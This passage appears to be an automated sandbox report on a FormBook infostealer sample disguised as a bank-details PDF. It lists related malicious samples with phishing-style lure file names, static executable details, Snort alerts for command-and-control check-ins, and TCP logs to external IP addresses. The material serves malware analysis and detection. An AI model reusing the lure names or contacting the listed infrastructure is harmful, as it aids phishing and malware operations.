                                                AWB_SHIPPING DOCS.exeGet hashmaliciousBrowse
                                                • 38.143.25.232
                                                HB8aERmVAq.exeGet hashmaliciousBrowse
                                                • 38.143.25.232
                                                kHS7OeVw4a.rtfGet hashmaliciousBrowse
                                                • 38.143.25.232

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                54328bd36c14bd82ddaa0c04b25ed9adHalkbank_Ekstre_20222601_073653_270424.pdf.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                Purchase Order 25.01.2022.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                BANK SLIP.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                SecuriteInfo.com.Trojan.Inject4.24879.16337.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                nuovo ordine 0038847788 01262022.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                ALDOM- ALD-797-R1.pdf.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                swift..exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                BANK INFORMATION-M0025012022-971332pdf.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                GULF OIL AND GAS.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                DHL_Jan 2022 at 1.20_8BZ2290_JPG.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                Purchase Order.pdf.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                LOG_CHECKING_crypted.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                Loader.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                RFQ No. 072022AMCDFL.pdf.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                Fiche Matiere.pdf.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                Shipping document.doc.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                PAORIDJ840112H73-A-259.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                Invoice#15678.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                PI.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                209876543345678909876543-09876543.exeGet hashmaliciousBrowse
                                                • 144.76.136.153

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BANK DETAILS-25012022-971332pdf.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1076
                                                Entropy (8bit):5.368419236023932
                                                Encrypted:false
                                                SSDEEP:24:ML9E4KrgKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPN+84xpNT:MxHKEYHKGD8AoPtHTG1hAHKKPN+vxpNT
                                                MD5:BA59E2E532D7B32DDB5669F4DDA552B9
                                                SHA1:56321A97094257CE0B8DD955B6F433D971093890
                                                SHA-256:C46FC927838D524FB8361EA17F8BB19694C7175106544FE95367E5DF8BD9891B
                                                SHA-512:2F1702E762B6DA239580311D0EEFF203DA8D584D6B5E0922DB730A4CE770DA46B750C380B70D3BED632DFBE28CAAB27B6067EEE57C152EE51828E03E5BA2214F
                                                Malicious:true
                                                Reputation:moderate, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\e82398e9ff6885d617e4b97e31fb4f02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\f2e3165e3c718b7ac302fea40614c984\System.Xml.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):6.795485235536029
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:BANK DETAILS-25012022-971332pdf.exe
                                                File size:51400
                                                MD5:a7f81ecd307166b18c038245a2005564
                                                SHA1:f4218fa763a80a578afa156011b5e0ca4346d0e8
                                                SHA256:376a0ec6b93ca5a330675d0dde65c0092b59fa92cf2341cf6d87ad7d62f7e55e
                                                SHA512:945362507b72acd45109f74c20218879f72f809b68a4caad140ddfcbebc4adb63ce54314581dd536bf096dad21964ca579e0e59cce69d6f6016f39e3f99bcd05
                                                SSDEEP:1536:NzRypga/eHUTQQQQQQQBdBgN6b5/2kWSC6WLrr1Q:RRypga/eHUTQQQQQQkdBft/2YWLrBQ
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................&...........E... ...`....@.. ....................... ............@................................

                                                File Icon

                                                Icon Hash:a289a9ed6da39200

                                                Static PE Info

                                                General

                                                Entrypoint:0x4045ae
                                                Entrypoint Section:.text
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp:0x61F08CEA [Tue Jan 25 23:51:06 2022 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:v4.0.30319
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Authenticode Signature

                                                Signature Valid:false
                                                Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                Signature Validation Error:The digital signature of the object did not verify
                                                Error Number:-2146869232
                                                Not Before, Not After
                                                • 3/5/2020 4:00:00 PM 3/15/2023 5:00:00 AM
                                                Subject Chain
                                                • CN="AVG Technologies USA, LLC", OU=RE stapler cistodc, O="AVG Technologies USA, LLC", L=Newton, S=North Carolina, C=US
                                                Version:3
                                                Thumbprint MD5:49FDEA7C33B5DA923ADD37FF577B5C01
                                                Thumbprint SHA-1:95AB6BCA9A015D877B443E71CB09C0ED0B5DE811
                                                Thumbprint SHA-256:17EBDA6A8C57FD8D67A0C517D0436752DCCBEC523F30FDFA75C1769857F0F1AF
                                                Serial:0E31E48D08065B098F84E7C510336074

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x45540x57.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x8340.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xae000x1ac8.rsrc
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x441c0x1c.text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x25b40x2600False0.427734375data5.27424128516IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rsrc0x60000x83400x8400False0.588008996212data6.83725695505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x100000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0x64700x468GLS_BINARY_LSB_FIRST
                                                RT_ICON0x68d80x1128data
                                                RT_ICON0x7a000x2668data
                                                RT_ICON0xa0680x40a2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                RT_GROUP_ICON0xe1100x3edata
                                                RT_VERSION0x61c00x2b0data
                                                RT_MANIFEST0xe1500x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Version Infos

                                                DescriptionData
                                                Translation0x0000 0x04b0
                                                LegalCopyrightCopyright 2022
                                                Assembly Version1.0.0.0
                                                InternalNameVXCSGDFD.exe
                                                FileVersion1.0.0.0
                                                ProductNameVXCSGDFD
                                                ProductVersion1.0.0.0
                                                FileDescriptionVXCSGDFD
                                                OriginalFilenameVXCSGDFD.exe

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                01/26/22-11:59:16.759000ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.78.8.8.8
                                                01/26/22-11:59:17.806275ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.78.8.8.8
                                                01/26/22-11:59:32.186251TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982980192.168.2.7192.0.78.25
                                                01/26/22-11:59:32.186251TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982980192.168.2.7192.0.78.25
                                                01/26/22-11:59:32.186251TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982980192.168.2.7192.0.78.25

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 26, 2022 11:57:44.183721066 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:44.183774948 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:44.183888912 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:44.567487955 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:44.567518950 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:44.649271965 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:44.649432898 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:44.659540892 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:44.659564972 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:44.660140038 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:44.707308054 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.114341021 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.161895990 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.479607105 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.479675055 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.479687929 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.479715109 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.479744911 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.479752064 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.479759932 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.479777098 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.479777098 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.479794979 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.479811907 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.479840994 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.480765104 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.480798960 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.480849028 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.480895996 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.480931997 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.480942965 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.480993986 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.503743887 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.503818989 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.503885031 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.503896952 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.503927946 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.503937960 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.504530907 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.504592896 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.504683971 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.504710913 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.504723072 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.504770041 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.505296946 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.505397081 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.505433083 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.505453110 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.505476952 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.505516052 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.526283026 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.526350975 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.526386976 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.526401997 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.526453018 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.526598930 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.526639938 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.526659012 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.526667118 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.526693106 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.526715040 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.527147055 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.527185917 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.527242899 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.527282000 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.527291059 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.527340889 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.527508020 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.527544022 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.527595997 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.527607918 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.527636051 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.527656078 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.527896881 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.527956963 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.528034925 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.528045893 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.528058052 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.528099060 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.528346062 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.528383017 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.528417110 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.528428078 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.528443098 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.528471947 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.528542042 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.528577089 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.528619051 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.528630972 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.528639078 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.528665066 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.550517082 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.550586939 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.550645113 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.550658941 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.550694942 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.550714970 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.551246881 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.551301003 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.551336050 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.551351070 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.551392078 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.551407099 CET44349756144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.551461935 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.555301905 CET49756443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.584796906 CET49757443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.584851027 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.584937096 CET49757443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.585329056 CET49757443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.585352898 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.634376049 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:45.644462109 CET49757443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:45.644504070 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:46.126636982 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:46.126696110 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:46.126789093 CET49757443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:46.126806021 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:46.126885891 CET49757443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:46.126893044 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:46.126956940 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:46.126971960 CET49757443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:46.127034903 CET49757443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:46.150294065 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:46.150341988 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:46.150439024 CET49757443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:46.150451899 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:46.150465965 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:46.150473118 CET49757443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:46.150489092 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:46.150559902 CET49757443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:46.150710106 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:46.150748014 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:46.150774956 CET49757443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:46.150811911 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:46.150842905 CET49757443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:46.150897026 CET44349757144.76.136.153192.168.2.7
                                                Jan 26, 2022 11:57:46.150943041 CET49757443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:46.150978088 CET49757443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:57:46.152220964 CET49757443192.168.2.7144.76.136.153
                                                Jan 26, 2022 11:59:03.510535955 CET4980680192.168.2.795.179.246.125
                                                Jan 26, 2022 11:59:03.533164024 CET804980695.179.246.125192.168.2.7
                                                Jan 26, 2022 11:59:03.533261061 CET4980680192.168.2.795.179.246.125
                                                Jan 26, 2022 11:59:03.533366919 CET4980680192.168.2.795.179.246.125
                                                Jan 26, 2022 11:59:03.555764914 CET804980695.179.246.125192.168.2.7
                                                Jan 26, 2022 11:59:03.555804968 CET804980695.179.246.125192.168.2.7
                                                Jan 26, 2022 11:59:03.556015015 CET4980680192.168.2.795.179.246.125
                                                Jan 26, 2022 11:59:03.556092024 CET804980695.179.246.125192.168.2.7
                                                Jan 26, 2022 11:59:03.556139946 CET4980680192.168.2.795.179.246.125
                                                Jan 26, 2022 11:59:03.578838110 CET804980695.179.246.125192.168.2.7
                                                Jan 26, 2022 11:59:08.598654032 CET4982180192.168.2.7217.160.0.98
                                                Jan 26, 2022 11:59:08.620873928 CET8049821217.160.0.98192.168.2.7
                                                Jan 26, 2022 11:59:08.622064114 CET4982180192.168.2.7217.160.0.98
                                                Jan 26, 2022 11:59:08.622078896 CET4982180192.168.2.7217.160.0.98
                                                Jan 26, 2022 11:59:08.643038034 CET8049821217.160.0.98192.168.2.7
                                                Jan 26, 2022 11:59:08.651669025 CET8049821217.160.0.98192.168.2.7
                                                Jan 26, 2022 11:59:08.651690960 CET8049821217.160.0.98192.168.2.7
                                                Jan 26, 2022 11:59:08.651835918 CET4982180192.168.2.7217.160.0.98
                                                Jan 26, 2022 11:59:08.653445959 CET4982180192.168.2.7217.160.0.98
                                                Jan 26, 2022 11:59:08.674333096 CET8049821217.160.0.98192.168.2.7
                                                Jan 26, 2022 11:59:26.368247986 CET4982880192.168.2.738.143.0.82
                                                Jan 26, 2022 11:59:26.541733980 CET804982838.143.0.82192.168.2.7
                                                Jan 26, 2022 11:59:26.541841984 CET4982880192.168.2.738.143.0.82
                                                Jan 26, 2022 11:59:26.541975975 CET4982880192.168.2.738.143.0.82
                                                Jan 26, 2022 11:59:26.715518951 CET804982838.143.0.82192.168.2.7
                                                Jan 26, 2022 11:59:26.744554996 CET804982838.143.0.82192.168.2.7
                                                Jan 26, 2022 11:59:26.744652987 CET804982838.143.0.82192.168.2.7
                                                Jan 26, 2022 11:59:26.744757891 CET804982838.143.0.82192.168.2.7
                                                Jan 26, 2022 11:59:26.744812012 CET4982880192.168.2.738.143.0.82
                                                Jan 26, 2022 11:59:26.744883060 CET804982838.143.0.82192.168.2.7
                                                Jan 26, 2022 11:59:26.744930029 CET804982838.143.0.82192.168.2.7
                                                Jan 26, 2022 11:59:26.744955063 CET4982880192.168.2.738.143.0.82
                                                Jan 26, 2022 11:59:26.744956017 CET804982838.143.0.82192.168.2.7
                                                Jan 26, 2022 11:59:26.744976997 CET804982838.143.0.82192.168.2.7
                                                Jan 26, 2022 11:59:26.745052099 CET4982880192.168.2.738.143.0.82
                                                Jan 26, 2022 11:59:26.745069027 CET4982880192.168.2.738.143.0.82
                                                Jan 26, 2022 11:59:27.095709085 CET4982880192.168.2.738.143.0.82
                                                Jan 26, 2022 11:59:27.269264936 CET804982838.143.0.82192.168.2.7
                                                Jan 26, 2022 11:59:32.169297934 CET4982980192.168.2.7192.0.78.25
                                                Jan 26, 2022 11:59:32.185751915 CET8049829192.0.78.25192.168.2.7
                                                Jan 26, 2022 11:59:32.185892105 CET4982980192.168.2.7192.0.78.25
                                                Jan 26, 2022 11:59:32.186250925 CET4982980192.168.2.7192.0.78.25
                                                Jan 26, 2022 11:59:32.205025911 CET8049829192.0.78.25192.168.2.7
                                                Jan 26, 2022 11:59:32.208456993 CET8049829192.0.78.25192.168.2.7
                                                Jan 26, 2022 11:59:32.208484888 CET8049829192.0.78.25192.168.2.7
                                                Jan 26, 2022 11:59:32.208667040 CET4982980192.168.2.7192.0.78.25
